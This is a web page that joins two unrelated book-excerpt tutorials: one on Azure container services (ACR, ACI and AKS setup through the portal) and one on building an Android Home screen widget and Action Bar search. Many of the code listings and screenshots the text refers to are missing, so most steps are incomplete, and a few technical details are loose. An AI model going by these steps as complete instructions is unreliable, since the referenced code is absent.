The next level of virtualization is containers, as they provide a better solution than virtual machines within Hyper-V: containers optimize resources by sharing as much as possible of the existing container platform. Azure Kubernetes Service (AKS) simplifies the deployment and operations of Kubernetes and enables users to dynamically scale their application infrastructure with agility, along with simplifying cluster maintenance with automated upgrades and scaling. Azure Container Service (ACS) simplifies the management of Docker clusters for running containerized applications. This tutorial will combine the concepts defined above and describe how to design and implement containers, and how to choose the proper solution for orchestrating them. You will get an overview of how Azure can help you to implement services based on containers and get rid of traditional virtualization, with its redundant OS resources that need to be managed, updated, backed up, and optimized. To run containers in a cloud environment, no specific installations are required, as you only need the following:
A computer with an internet browser
An Azure subscription (if not available, a trial could work too)
With Azure, you will have the option to order a container directly in Azure as an Azure Container Instance (ACI), or a managed Azure solution using Kubernetes as the orchestrator. This tutorial is an excerpt from a book written by Florian Klaffenbach et al. titled Implementing Azure Solutions - Second Edition. This book will get you up and running with Azure services and teach you how to implement them in your organization. All of the code for this tutorial can be found at GitHub.
Azure Container Registry (ACR)
If you need to set up a container environment to be used by the developers in your Azure tenant, you will have to think about where to store your container images. In general, the way to do this is to provide a container registry.
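The walkthrough below uses the portal, but a registry can also be created from scripts. As a sketch, a small helper that assembles the corresponding Azure CLI call might look like this; the az acr create command and its flags are real, but the registry and resource-group names below are made-up examples:

```python
# Build an `az acr create` invocation for the given registry settings.
# The names passed in at the bottom are hypothetical examples.
def acr_create_command(name, resource_group, location="westeurope",
                       sku="Basic", admin_enabled=False):
    parts = ["az", "acr", "create",
             "--name", name,
             "--resource-group", resource_group,
             "--location", location,
             "--sku", sku]
    if admin_enabled:
        # Corresponds to the admin user option discussed in this section
        parts += ["--admin-enabled", "true"]
    return " ".join(parts)

print(acr_create_command("myregistry", "container-rg", sku="Standard"))
```

Verify the flags against the current Azure CLI documentation before use.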
This registry could reside on a VM itself, but using PaaS services with cloud technologies always provides an easier and more flexible design. This is where Azure Container Registry (ACR) comes in, as it is a PaaS solution that provides high flexibility and even features such as replication between geographies. When you create your container registry, you will need to define the following:
The registry name (ending with azurecr.io)
The resource group the registry sits in
The Azure location
The admin user (if you will need to log in to the registry using an account)
The SKU: Basic, Standard, or Premium
The following table details the features and limits of the basic, standard, and premium service tiers:

Resource                    Basic    Standard   Premium
Storage                     10 GiB   100 GiB    500 GiB
Max image layer size        20 GiB   20 GiB     50 GiB
ReadOps per minute          1,000    3,000      10,000
WriteOps per minute         100      500        2,000
Download bandwidth (MBps)   30       60         100
Upload bandwidth (MBps)     10       20         50
Webhooks                    2        10         100
Geo-replication             N/A      N/A        Supported

Switching between the different SKUs is supported and can be done using the portal, PowerShell, or the CLI. If you are still on a classic ACR, the first step would be to upgrade to a managed registry.
Azure Container Instances
By running your workloads in ACI, you don't have to set up a management infrastructure for your containers; you can just put your focus on designing and building the applications.
Creating your first container in Azure
Let's create a first simple container in Azure using the portal: Go to Container Instances under New | Marketplace | Everything, as shown in the following screenshot: After having chosen the Container Instances entry in the resources list, you will have to define some properties. We will need to define the Azure container name. Of course, this needs to be unique in your environment.
Then, we will need to define the source of the image, and to which resource group and region it should be deployed within Azure. As already mentioned, containers can run on Windows or Linux, so this needs to be defined first. Afterwards, we will need to define the resources per container:
Cores
Memory
Ports
Port protocol
Restart policy (if the container goes offline)
After having deployed the corresponding container registry, we can start working with the container instance: When hitting the URL posted in the left part, under FQDN, you should see the following screenshot: After we have finalized the preceding steps, we have an ACI up and running, which means that you are able to provide container images, load them up to Azure, and run them.
Azure Marketplace containers
In the public Azure Marketplace, you can find existing container images that can simply be deployed to your subscription. These are pre-packaged images that give you the option to start with your first container in Azure. As cloud services provide reusability and standardization, this entry point is always a good one to look at first. Before starting with this, we will need to check whether the required resource providers are enabled on the subscription you are working with. Otherwise, we will need to register them by hitting the Register entry and waiting a few minutes for completion, as shown in the following screenshot: Now, we can start deploying marketplace containers, such as the container image for WordPress, which is used as a sample, as shown in the following screenshot: First, we will need to decide on the corresponding image and choose to create a new ACR, or use an existing one. Furthermore, the Azure region, the resource group, and the tag (for example, the version) need to be defined in the following dialog: Now that the registry has been created, we will need to update the permission settings, also known as enabling the admin registry.
This can be done with the Admin user Enable button, as shown in the following screenshot: Regarding the SKU, this is another point where we can set the priority and define performance. Enabling the admin user may take some minutes. Now, we can start deploying container images from the container registry, as you can see in the following screenshot with the WordPress image that is already available in the registry: First, we will need to choose the corresponding container from the registry; right-click the tag version in the Tags section: Having done that, we will need to hit the Deploy to web app menu entry to deploy the web app to Azure: As the properties that need to be filled in are defaults for Web Apps, it is quite easy to set them: Finally, the first containerized image for a web app has been deployed to Azure.
Container orchestration
One of the most interesting aspects of containers is that they provide technology for scaling. For example, if we need more performance on a website that is running containerized, we would just spin up an additional container and load-balance the traffic. The same applies when we need to scale down.
The concept of container orchestration
For this, we need an orchestration tool to provide this feature set. There are some well-known container orchestration tools available on the market, such as the following:
Docker Swarm
DC/OS
Kubernetes
Kubernetes is the most widely used, and can therefore be deployed as a service in most public clouds, such as Azure.
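As a taste of what such an orchestrator automates, Kubernetes' Horizontal Pod Autoscaler computes the desired replica count as roughly ceil(currentReplicas * currentMetric / targetMetric). The following is a minimal sketch of that formula only, ignoring the tolerance band and stabilization behaviour the real controller adds:

```python
import math

# Sketch of the Horizontal Pod Autoscaler scaling rule:
# desired = ceil(current * currentMetric / targetMetric)
def desired_replicas(current_replicas, current_metric, target_metric):
    return math.ceil(current_replicas * current_metric / target_metric)

print(desired_replicas(4, 90, 60))  # load above target -> scale out to 6
print(desired_replicas(4, 30, 60))  # load below target -> scale in to 2
```

This is exactly the "horizontal scaling" feature listed below: replicas are added when the observed metric exceeds the target, and removed when it falls below it.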
It provides the following features:
Automated container placement: Places containers on the container hosts so as to best spread the load between them
Self-healing: Restarts failed containers in a proper way
Horizontal scaling: Automated horizontal scaling (up and down) based on the existing load
Service discovery and load balancing: Provides IP addresses to containers and manages DNS registrations
Rollout and rollback: Automated rollout and rollback for containers, which provides another self-healing feature, as newly rolled-out updated containers are simply rolled back if something goes wrong
Configuration management: Updates secrets and configurations without the need to fully rebuild the container itself
Azure Kubernetes Service (AKS)
Installing, maintaining, and administering a Kubernetes cluster manually could mean a huge investment of time for a company. These are largely one-off tasks, so it is best not to waste resources on them. In Azure today, there is a feature called AKS, a managed Kubernetes service. For AKS, there is no charge for the Kubernetes masters; you just have to pay for the nodes that are running the containers. Before you start, you will have to fulfill the following prerequisites:
An Azure account with an active subscription
Azure CLI installed and configured
Kubernetes command-line tool, kubectl, installed
Make sure that the Azure subscription you use has these required resources—storage, compute, networking, and a container service: For the first step, you need to choose Kubernetes service and choose to create your AKS deployment for your tenant.
The following parameters need to be defined:
Resource group for the deployment
Kubernetes cluster name
Azure region
Kubernetes version
DNS prefix
Then, hit the Authentication tab, as shown in the following screenshot: On the Authentication tab, you will need to define a service principal or choose an existing one, as AKS needs a service principal to run the deployment. In addition, you could enable the RBAC feature, which gives you the chance to define fine-grained permissions based on Azure AD accounts and groups. On the Networking tab, you can choose either to add the Kubernetes cluster to an existing VNET, or to create a new one. In addition, the HTTP routing feature can be enabled or disabled: On the Monitoring tab, you have the option to enable container monitoring and link it to an existing Log Analytics workspace, or create a new one: The following is where you set your required tags: Finally, the validation will check for any misconfigurations and create the Azure ARM template for the deployment. Clicking the Create button will start the deployment phase, which could run for several minutes or even longer, depending on the chosen features and scale: After the deployment has finished, the Kubernetes dashboard is available. You can view it by clicking on the View Kubernetes dashboard link, as shown in the following screenshot: The dashboard looks something like the one shown in the following screenshot: As you can see in the preceding screenshot, there are four steps to open the dashboard. First, we will need to install the Azure CLI in its most current version using the statement mentioned in the following screenshot: Afterwards, the AKS CLI, called kubectl.exe, needs to be installed.
Finally, after setting all the parameters (and when you have performed steps 3 and 4 from the preceding task list), the following dashboard should open in a new browser window: The preceding dashboard provides a way to monitor and administer your Azure Kubernetes environment, in general, from a GUI. If a new Kubernetes version becomes available, you can easily update it from the Azure portal yourself with one click, as shown in the following screenshot: If you need to scale your AKS hosts, this is quite easy too, as you can do it through the Azure portal. A maximum of 100 hosts with 3 vCPUs and 10.5 GB RAM per host is currently possible: You can now upload your containers to your AKS-enabled Docker environment and have a hugely scalable infrastructure with a minimum of administrative tasks and implementation time. If you need to monitor AKS, it is fully integrated with Azure monitoring. By clicking the Monitor container health link, you will be directed to the following overview: The Nodes tab provides the following information per node: This not only gives a brief overview of the health status, but also the number of containers and the load on the node itself.
The Controllers view provides detailed information on the AKS controller, its services, status, and uptime: And finally, the Containers tab gives a deep overview of the health state of each container running in the infrastructure (system containers included): By hitting the Search logs section, you can define your own custom Azure monitoring searches and integrate them into your custom portal: To get everything up and running, the following to-do list gives a brief overview of all the tasks needed to provide an app within AKS:
Prepare the AKS app
Create the container registry
Create the Kubernetes cluster
Run the application in AKS
Scale the application in AKS
Update the application in AKS
AKS has the following service quotas and limits:

Resource                                                Default limit
Max nodes per cluster                                   100
Max pods per node (basic networking with Kubenet)       110
Max pods per node (advanced networking with Azure CNI)  301
Max clusters per subscription                           100

As you have seen, AKS in Azure provides great features with a minimum of administrative tasks.
Summary
In this tutorial, we learned the basics required to understand, deploy, and manage container services in a public cloud environment. The concept of containers is a great idea, and surely the next step in virtualization that applications need to take. Setting up the environment manually is quite complex, but with the PaaS approach the setup procedure is quite simple (because of automation) and allows you to just start using it. To understand how to build robust cloud solutions on Azure, check out our book Implementing Azure Solutions - Second Edition.

Natasha Mathur
14 Jan 2019
12 min read

Implementing a home screen widget and search bar on Android [Tutorial]

In this tutorial, we'll look at how to create a Home screen App Widget, which users can use to add your app to their Home screen. We'll also explore adding a Search option to the Action Bar using the Android SearchManager API. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores techniques and knowledge of graphics, animations, media, and more, to help you develop applications using the latest Android framework.
Creating a Home screen widget
Before we dig into the code for creating an App Widget, let's cover the basics. There are three required components and one optional one:
The AppWidgetProviderInfo file: An XML resource
The AppWidgetProvider class: A Java class
The View layout file: A standard layout XML file, with some restrictions
The App Widget configuration Activity (optional): An Activity the OS will launch when placing the widget, to provide configuration options
The AppWidgetProvider must also be declared in the AndroidManifest file. Since AppWidgetProvider is a helper class based on the Broadcast Receiver, it is declared in the manifest with the <receiver> element. Here is an example manifest entry: The metadata points to the AppWidgetProviderInfo file, which is placed in the res/xml directory.
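The manifest listing itself is not reproduced in this excerpt. A declaration consistent with the description (the receiver and resource names match this recipe; the book's exact listing may differ) would look like:

```xml
<!-- Illustrative only: a <receiver> entry for the recipe's provider,
     with metadata pointing to the AppWidgetProviderInfo in res/xml -->
<receiver android:name=".HomescreenWidgetProvider">
    <intent-filter>
        <action android:name="android.appwidget.action.APPWIDGET_UPDATE" />
    </intent-filter>
    <meta-data
        android:name="android.appwidget.provider"
        android:resource="@xml/appwidget_info" />
</receiver>
```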
Here is a sample AppWidgetProviderInfo.xml file: The following is a brief overview of the available attributes:
minWidth: The default width when placed on the Home screen
minHeight: The default height when placed on the Home screen
updatePeriodMillis: The onUpdate() polling interval (in milliseconds)
initialLayout: The AppWidget layout
previewImage (optional): The image shown when browsing App Widgets
configure (optional): The activity to launch for configuration settings
resizeMode (optional): The flags indicating resizing options: horizontal, vertical, none
minResizeWidth (optional): The minimum width allowed when resizing
minResizeHeight (optional): The minimum height allowed when resizing
widgetCategory (optional): Android 5+ only supports Home screen widgets
The AppWidgetProvider extends the BroadcastReceiver class, which is why the <receiver> element is used when declaring the AppWidget in the Manifest. As it's a BroadcastReceiver, the class still receives OS broadcast events, but the helper class filters those events down to those applicable to an App Widget. The AppWidgetProvider class exposes the following methods:
onUpdate(): Called when initially created and at the specified interval
onAppWidgetOptionsChanged(): Called when initially created and any time the size changes
onDeleted(): Called any time a widget is removed
onEnabled(): Called the first time a widget is placed (it isn't called when adding second and subsequent widgets)
onDisabled(): Called when the last widget is removed
onReceive(): Called on every event received, including the preceding events; usually not overridden, as the default implementation only dispatches applicable events
The last required component is the layout.
An App Widget uses a Remote View, which only supports a subset of the available layouts:
AdapterViewFlipper
FrameLayout
GridLayout
GridView
LinearLayout
ListView
RelativeLayout
StackView
ViewFlipper
And it supports the following widgets:
AnalogClock
Button
Chronometer
ImageButton
ImageView
ProgressBar
TextClock
TextView
With App Widget basics covered, it's now time to start coding. Our example will cover the basics so you can expand the functionality as needed. This recipe uses a View with a clock, which, when pressed, opens our activity. The following screenshot shows the widget in the widget list when adding it to the Home screen (the widget list's appearance varies by the launcher used): Here's a screenshot showing the widget after it is added to the Home screen:
Getting ready
Create a new project in Android Studio and call it AppWidget. Use the default Phone & Tablet options and select the Empty Activity option when prompted for the Activity Type.
How to do it...
We'll start by creating the widget layout, which resides in the standard layout resource directory. Then, we'll create the XML resource directory to store the AppWidgetProviderInfo file. We'll add a new Java class and extend AppWidgetProvider, which handles the onUpdate() call for the widget. With the receiver created, we can then add it to the Android Manifest. Here are the detailed steps:
Create a new file in res/layout called widget.xml using the following XML:
Create a new directory called XML in the resource directory. The final result will be res/xml.
Create a new file in res/xml called appwidget_info.xml using the following XML: (If you cannot see the new XML directory, switch from Android view to Project view in the Project panel drop-down.)
Create a new Java class called HomescreenWidgetProvider, extending from AppWidgetProvider.
Add the following onUpdate() method to the HomescreenWidgetProvider class:
Add the HomescreenWidgetProvider to the AndroidManifest using the following XML declaration within the <application> element:
Run the program on a device or emulator. After first running the application, the widget will then be available to add to the Home screen.
How it works...
Our first step is to create the layout file for the widget. This is a standard layout resource with the restrictions based on the App Widget being a Remote View, as discussed in the recipe introduction. Although our example uses an Analog Clock widget, this is where you'd want to expand the functionality based on your application needs. The XML resource directory serves to store the AppWidgetProviderInfo file, which defines the default widget settings. The configuration settings determine how the widget is displayed when initially browsing the available widgets. We use very basic settings for this recipe, but they can easily be expanded to include additional features, such as a preview image to show a functioning widget, and sizing options. The updatePeriodMillis attribute sets the update frequency. Since the update will wake up the device, it's a trade-off between having up-to-date data and battery life. (This is where the optional Settings Activity is useful, by letting the user decide.) The AppWidgetProvider class is where we handle the onUpdate() event triggered by the updatePeriodMillis polling. Our example doesn't need any updating, so we set the polling to zero. The update is still called when initially placing the widget. onUpdate() is where we set the pending intent to open our app when the clock is pressed. Since the onUpdate() method is probably the most complicated aspect of AppWidgets, we'll explain it in some detail. First, it's worth noting that onUpdate() will occur only once each polling interval for all the widgets created by this provider.
(All additional widgets created will use the same cycle as the first widget created.) This explains the for loop, as we need it to iterate through all the existing widgets. This is where we create a pending intent, which calls our app when the clock widget is pressed. As discussed earlier, an AppWidget is a Remote View. Therefore, to get the layout, we call RemoteViews() with our fully qualified package name and the layout ID. Once we have the layout, we can attach the pending intent to the clock view using setOnClickPendingIntent(). We then call the AppWidgetManager's updateAppWidget() method to initiate the changes we made. The last step to make all this work is to declare the widget in the Android Manifest. We identify the action we want to handle with the <intent-filter>. Most App Widgets will likely want to handle the Update event, as ours does. The other item to note in the declaration is the following line: This tells the system where to find our configuration file.
Adding Search to the Action Bar
Along with the Action Bar, Android 3.0 introduced the SearchView widget, which can be included as a menu item when creating a menu. This is now the recommended UI pattern for providing a consistent user experience. The following screenshot shows the initial appearance of the Search icon in the Action Bar: The following screenshot shows how the Search option expands when pressed: If you want to add Search functionality to your application, this recipe will walk you through the steps to set up your User Interface and properly configure the Search Manager API.
Getting ready
Create a new project in Android Studio and call it SearchView. Use the default Phone & Tablet options and select Empty Activity when prompted for the Activity Type.
How to do it...
To set up the Search UI pattern, we need to create the Search menu item and a resource called searchable. We'll create a second activity to receive the search query. Then, we'll hook it all up in the AndroidManifest file.
To get started, open the strings.xml file in res/values and follow these steps:
Add the following string resources:
Create the menu directory: res/menu.
Create a new menu resource called menu_search.xml in res/menu using the following XML:
Open MainActivity and add the following onCreateOptionsMenu() to inflate the menu and set up the Search Manager:

@Override
public boolean onCreateOptionsMenu(Menu menu) {
    MenuInflater inflater = getMenuInflater();
    inflater.inflate(R.menu.menu_search, menu);
    SearchManager searchManager =
            (SearchManager) getSystemService(Context.SEARCH_SERVICE);
    MenuItem searchItem = menu.findItem(R.id.menu_search);
    SearchView searchView = (SearchView) searchItem.getActionView();
    searchView.setSearchableInfo(
            searchManager.getSearchableInfo(getComponentName()));
    return true;
}

Create a new XML resource directory: res/xml.
Create a new file in res/xml called searchable.xml using the following XML:
Create a new layout called activity_search_result.xml using this XML:
Add a new Empty Activity to the project called SearchResultActivity.
Add the following variable to the class:
TextView mTextViewSearchResult;
Change onCreate() to load our layout, set the TextView, and check for the QUERY action:
Add the following method to handle the search:
With the User Interface and code now complete, we just need to hook everything up correctly in the AndroidManifest. Here is the complete manifest, including both activities:
Run the application on a device or emulator. Type in a search query and hit the Search button (or press Enter). The SearchResultActivity will be displayed, showing the search query entered.
How it works...
Since the New Project Wizard uses the AppCompat library, our example uses the support library API. Using the support library provides the greatest device compatibility, as it allows the use of modern features (such as the Action Bar) on older versions of the Android OS. We start by creating string resources for the Search View.
In step 3, we create the menu resource, as we've done many times. One difference is that we use the app namespace for the showAsAction and actionViewClass attributes. The earlier versions of the Android OS don't include these attributes in the Android namespace, which is why we create an app namespace. This serves as a way to bring new functionality to older versions of the Android OS. In step 4, we set up the SearchManager, using the support library APIs. Step 6 is where we define the searchable XML resource, which is used by the SearchManager. The only required attribute is the label, but a hint is recommended so the user will have an idea of what they should type in the field. The android:label must match the application name or the activity name and must use a string resource (as it does not work with a hardcoded string). Steps 7-11 are for the SearchResultActivity. Calling the second activity is not a requirement of the SearchManager, but is commonly done to provide a single activity for all searches initiated in your application. If you run the application at this point, you would see the search icon, but nothing would work. Step 12 is where we put it all together in the AndroidManifest file. The first item to note is the following: Notice this is in the <application> element and not in either of the <activity> elements. By defining it at the <application> level, it will automatically apply to all <activities>. If we moved it to the MainActivity element, it would behave exactly the same in our example. You can define styles for your application in the <application> node and still override individual activity styles in the <activity> node. We specify the searchable resource in the SearchResultActivity <meta-data> element: We also need to set the intent filter for SearchResultActivity as we do here: The SearchManager broadcasts the SEARCH intent when the user initiates the search. This declaration directs the intent to the SearchResultActivity activity. 
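The searchable.xml resource discussed above is not reproduced in this excerpt. A minimal version consistent with the description (only the label is required, both values must be string resources; the exact resource names here are assumptions) would be:

```xml
<!-- Hypothetical searchable.xml: label is required and must match the
     application or activity name; hint is recommended for usability -->
<searchable xmlns:android="http://schemas.android.com/apk/res/android"
    android:label="@string/app_name"
    android:hint="@string/search_hint" />
```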
Once the search is triggered, the query text is sent to the SearchResultActivity using the SEARCH intent. We check for the SEARCH intent in onCreate() and extract the query string using the following code: You now have the Search UI pattern fully implemented. With the UI pattern complete, what you do with the search results is specific to your application needs. Depending on your application, you might search a local database or maybe a web service. So, we discussed creating a shortcut on the Home screen, creating a Home screen widget, and adding Search to the Action Bar. Be sure to check out the book 'Android 9 Development Cookbook - Third Edition' if you're interested in learning how to show your app in full-screen and enable lock screen shortcuts.